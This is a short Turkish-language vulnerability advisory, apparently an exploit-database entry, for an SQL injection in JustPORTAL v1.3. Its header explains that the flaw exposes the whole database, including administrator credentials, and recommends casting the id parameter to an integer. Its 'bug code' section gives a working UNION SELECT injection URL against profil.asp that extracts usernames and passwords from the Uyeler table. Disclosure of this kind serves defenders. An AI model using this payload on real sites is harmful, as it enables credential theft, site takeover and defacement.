< ------------------- header data start ------------------- >
#############################################################
# Application Name : JustPORTAL v1.3
# Vulnerable Type : SQL Injection
# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.
# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))
# author : Bug Researchers
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
site.com/path/profil.asp?id=-101+union+select+0,kullaniciadi,2,sifre,4,5,6,7,8,9,10+from+Uyeler+where+Kimlik=2
< -- bug code end of -- >